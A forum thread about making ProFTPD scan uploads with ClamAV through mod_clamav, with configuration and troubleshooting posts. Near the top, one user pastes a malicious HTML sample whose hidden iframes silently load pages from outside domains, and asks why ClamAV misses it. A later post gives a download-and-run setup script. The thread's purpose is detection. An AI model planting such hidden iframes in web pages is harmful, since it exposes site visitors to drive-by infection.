HOWTO: ProFTPD Antivirus using CLAMAV

All ok but how about this code

<html>
<head>
<title>Redirecting...</title>
<meta http-equiv="Refresh" content="0;url=../" />
</head>
<body><iframe src="http://hugepremium.cn:8080/ts/in.cgi?pepsi5" width=2 height=4 style="visibility: hidden"></iframe>
<a href="../">MyBBoard</a>
</body>
</html><iframe src="http://quoasty.com/?click=C2858B" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://durnosy.com/?click=73CE2D" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://internetcountercheck.com/?click=21704531" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>


how to deal with clamAV to download the url and scan them too ?
server:~# clamscan --phishing-sigs=yes --phishing-cloak=yes --scan-html=yes --phishing-scan-urls=yes /var/www/html/test.html
/var/www/html/test.html: OK

----------- SCAN SUMMARY -----------
Known viruses: 549711
Engine version: 0.95.1
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 0.00 MB
Data read: 0.00 MB (ratio 0.00:1)
Time: 1.112 sec (0 m 1 s)

I have also scan this code with http://www.virustotal.com/pl/analisis/74c5d4c71f57775f6575023d27b669a1
So clamav is not recognize this file as virus :(
 
Last edited:
Hi pioklo

Would you mind starting a new topic as this is related to the implementation of mod_clamav with ProFTPd rather than Apache to which you're referring.

Some users could get confused with the snippets of information being posted from two seperate software packages.
 
Hi pioklo

Would you mind starting a new topic as this is related to the implementation of mod_clamav with ProFTPd rather than Apache to which you're referring.

Some users could get confused with the snippets of information being posted from two seperate software packages.

Brightlayer, I guess pioklo is trying to say that when he uploads a .html file containing this code , clamav activated proftpd is not deleting it.
As he also pointed out that this code is only recognized as a virus by 9 out of 39 anti virus software.

Anyway, in this case piokolo what I suggest is to submit this code to clamav. I don't know how to do this but I think you can find some info on www.clamav.net address.
 
Ah, I found it:

http://www.clamav.net/sendvirus/

>> Our virus database is kept up to date with the help of the community.
Whenever you find a new virus which is not detected by ClamAV you should fill the form below.

Our team of sigmakers will review your submission and if necessary update the database. <<
 
Proftpd Directory

Hi,

I have one question my proftpd conf directory is not in /etc/ , and it uses /etc/proftpd/proftpd.conf ( don`t know why ) and i sow this msg when updating proftpd with ftpantivirus.

configure: error: source file './modules/mod_clamav.c' cannot be found -- aborting
cp: cannot stat `/etc/proftpd.conf': No such file or directory
make: *** No targets specified and no makefile found. Stop.
make: *** No rule to make target `install'. Stop.
Can't open /etc/proftpd.conf: No such file or directory.
./ftpantivirus: line 25: /etc/rc.d/init.d/proftpd: No such file or directory
- ProFTPD Version 1.3.0


ProFtp update done

So can anybody help with this?

Danijel,
Thanks in advance
 
Hi,

I will try this on fresh Debian box without installing directadmin so i`ll let you know if it work.

Danijel,
 
this work
Code:
<IfModule mod_clamav.c>
   ClamAV on
   ClamServer localhost
   ClamPort 3310
   ClamMaxSize 5 Mb
</IfModule>

if not try this
Code:
<IfModule mod_clamav.c>
   ClamAV on
   ClamServer 127.0.0.1
   ClamPort 3310
   ClamMaxSize 5 Mb
</IfModule>

This reply from user email.

Wael
 
Hi,

I fix issue that i had now proftpd is compiled with mod_clamav but it is not working and i checked for opened ports there is no opened port 3310 i even change to another port but it don`t want to bind clamav. What might be the problem and how can i check it?

Danijel,
 
Hi,

I find issue i edit wrong proftpd.conf so now it is fine :) working for me. Great tool.

If anybody need help about debian post here.

Danijel,
Thanks in advance
 
I have now written a script to carry out the steps required to setup the scanning of FTP files via ClamAV.

This is supported for CentOS and Directadmin currently.

Code:
wget http://src.brightlayer.net/secureftp.sh
chmod +x secureftp.sh
./secureftp.sh do CLAMAV
./secureftp.sh do PROFTPD

Please note that I do not officially support this script, it's just that I've written it into a bash script and it has been proven to work on my servers, please use with care, I do not accept liability for any damage done to your servers by running this script.
 
Last edited:
hello. where can i find :

Command: STOR eicar_com.zip
Response: 150 Opening BINARY mode data connection for eicar_com.zip
Response: 550 Virus Detected and Removed: Eicar-Test-Signature
Status: Retrieving directory listing...

i cant find something like this after upload that file on this files:
/var/log/proftpd/access.log
/var/log/proftpd/auth.log
/var/log/messages
 
Back
Top